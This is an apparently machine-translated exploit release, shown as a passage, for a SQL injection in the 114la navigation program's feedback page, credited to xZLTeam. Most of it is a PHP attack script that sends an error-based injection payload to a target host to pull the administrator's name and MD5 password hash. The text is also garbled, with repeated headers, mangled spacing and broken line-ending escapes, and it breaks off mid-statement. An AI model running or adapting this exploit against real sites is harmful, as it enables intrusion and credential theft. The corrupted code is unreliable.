114 la URL navigation message book Injection Vulnerability

The injection vulnerability exists in the message files of the navigation program on the 114 website of Yulin Mufeng. Attackers can use EXP to obtain the Administrator account and MD5 password. Version: 1.5EXP :? Php $ sbcopyright ---------------------------------------- 114 lafeedbackinjectionVulExploitByxZLTeam: www.0kee. com20

The injection vulnerability exists in the message files of the navigation program on the 114 website of Yulin Mufeng. Attackers exploit EXP

You can get the Administrator account and the MD5 password.

Version: <= 1.5

EXP:

php$sbcopyright='----------------------------------------114la feedback injection Vul ExploitBy xZLTeam: www.0kee.com2011.04.02 Usage: php '.$argv[0].' host /pathExample: php '.$argv[0].' 127.0.0.1 /----------------------------------------';if ($argc < 3) {print_r($sbcopyright);die();} ob_start(); $url = $argv[1];$path= $argv[2]; $sock = fsockopen("$url", 80, $errno, $errstr, 30);if (!$sock) die("$errstr ($errno)n");$data = "username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~"; fwrite($sock, "POST $path/feedback/feedback.php HTTP/1.1rn");fwrite($sock, "Accept: */*rn");fwrite($sock, "Referer: http://$url/#Mrn");fwrite($sock, "Accept-Language: zh-cnrn");fwrite($sock, "Content-Type: application/x-www-form-urlencodedrn");fwrite($sock, "Accept-Encoding: gzip, deflatern");fwrite($sock, "User-Agent: Mozillarn");fwrite($sock, "Host: $urlrn");fwrite($sock, "Content-Length: ".strlen($data)."rn");fwrite($sock, "Connection: Keep-Alivern");fwrite